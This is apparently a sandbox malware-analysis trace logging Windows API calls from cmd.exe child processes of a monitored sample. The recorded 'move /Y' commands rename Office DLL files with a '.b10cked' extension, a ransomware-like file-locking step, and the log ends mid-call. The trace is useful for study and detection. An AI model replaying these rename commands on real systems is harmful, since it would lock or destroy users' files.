[0168.720] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.720] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.720] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.721] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.721] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.721] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.721] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.721] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.721] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.721] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0168.726] GetConsoleTitleW (in: lpConsoleTitle=0x22f628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.726] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.726] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.726] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.726] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.726] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.726] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.727] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.727] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.727] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.727] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.727] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.727] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.727] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.727] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.727] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.727] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.727] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.727] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.727] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.727] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.727] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.728] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.728] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.728] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.728] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.728] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.728] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.730] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f3e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f3dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f3dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.730] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.730] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.730] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.731] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.734] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0168.734] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0168.734] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0168.734] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~1.trx")) returned 0x2020 [0168.735] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x411f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.735] SetErrorMode (uMode=0x0) returned 0x0 [0168.735] SetErrorMode (uMode=0x1) returned 0x0 [0168.735] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x22ed6c, lpFilePart=0x22ed54 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", lpFilePart=0x22ed54*="MSOINT~1.TRX") returned 0x3c [0168.735] SetErrorMode (uMode=0x0) returned 0x1 [0168.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.736] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0168.736] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0168.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~1.trx")) returned 0x2020 [0168.736] SetErrorMode (uMode=0x0) returned 0x0 [0168.736] SetErrorMode (uMode=0x1) returned 0x0 [0168.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x22f1e8, lpFilePart=0x22ef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", lpFilePart=0x22ef80*="MSOINT~1.TRX") returned 0x3c [0168.737] SetErrorMode (uMode=0x0) returned 0x1 
[0168.737] SetErrorMode (uMode=0x0) returned 0x0 [0168.737] SetErrorMode (uMode=0x1) returned 0x0 [0168.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22f3f0, lpFilePart=0x22ef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x22ef80*="MSOINTL.DLL.trx_dll.b10cked") returned 0x4b [0168.737] SetErrorMode (uMode=0x0) returned 0x1 [0168.737] SetLastError (dwErrCode=0x0) [0168.737] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll.b10cked")) returned 0xffffffff [0168.737] GetLastError () returned 0x2 [0168.737] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x22e8fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e8fc) returned 0x412130 [0168.738] FindNextFileW (in: hFindFile=0x412130, lpFindFileData=0x22e8fc | out: lpFindFileData=0x22e8fc) returned 0 [0168.987] GetLastError () returned 0x12 [0168.987] FindClose (in: hFindFile=0x412130 | out: hFindFile=0x412130) returned 1 [0168.990] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x411cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x411cc0) returned 0x412130 [0168.990] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22eb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0168.990] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x22eb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0168.991] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll")) returned 0x2020 [0168.991] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.994] FindClose (in: hFindFile=0x412130 | out: hFindFile=0x412130) returned 1 [0168.995] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22eb48 | out: _Buffer=" 1") returned 9 [0168.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.995] GetFileType (hFile=0x7) returned 0x2 [0168.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ead4 | out: lpMode=0x22ead4) returned 1 [0168.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.996] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22eb08 | out: lpConsoleScreenBufferInfo=0x22eb08) returned 1 [0168.996] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.997] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22eb48 | out: lpBuffer=" 1 
file(s) moved.\r\n") returned 0x1a [0168.997] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22eb2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22eb2c*=0x1a) returned 1 [0168.997] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.997] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.998] SetConsoleInputExeNameW () returned 0x1 [0168.998] GetConsoleOutputCP () returned 0x1b5 [0168.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.999] exit (_Code=0) Process: id = "289" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22759 start_va = 0x10000 end_va = 0x2ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22760 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22761 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22762 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 22763 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22764 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22765 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22766 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22767 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 22768 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22904 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22905 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id 
= 22906 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22907 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22908 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 22909 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22910 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22911 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22912 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22913 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22914 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22915 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22916 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22917 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22918 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 22919 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22920 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22921 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22922 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22923 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 22924 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22925 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 22926 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" 
filename = "" Region: id = 22927 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 353 os_tid = 0x130 [0168.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa64 | out: lpSystemTimeAsFileTime=0x26fa64*(dwLowDateTime=0x9bb26f00, dwHighDateTime=0x1d440a9)) [0168.681] GetCurrentProcessId () returned 0xc4 [0168.681] GetCurrentThreadId () returned 0x130 [0168.681] GetTickCount () returned 0x31d9d [0168.681] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa5c | out: lpPerformanceCount=0x26fa5c*=22547018698) returned 1 [0168.682] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.682] __set_app_type (_Type=0x1) [0168.682] __p__fmode () returned 0x76b331f4 [0168.682] __p__commode () returned 0x76b331fc [0168.682] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.682] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.682] GetCurrentThreadId () returned 0x130 [0168.682] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x130) returned 0x38 [0168.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.683] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.683] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.683] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9f4 | out: phkResult=0x26f9f4*=0x0) returned 0x2 [0168.683] VirtualQuery (in: lpAddress=0x26fa2b, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x26f000, AllocationBase=0x170000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.683] GetConsoleOutputCP () returned 0x1b5 [0168.684] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.684] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.684] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.684] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.684] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.684] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.685] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.685] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.685] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.685] GetEnvironmentStringsW () returned 0x80210* [0168.685] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0168.685] GetEnvironmentStringsW () returned 0x80210* [0168.686] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0168.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e964 | out: phkResult=0x26e964*=0x40) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0xa0, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x0, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW 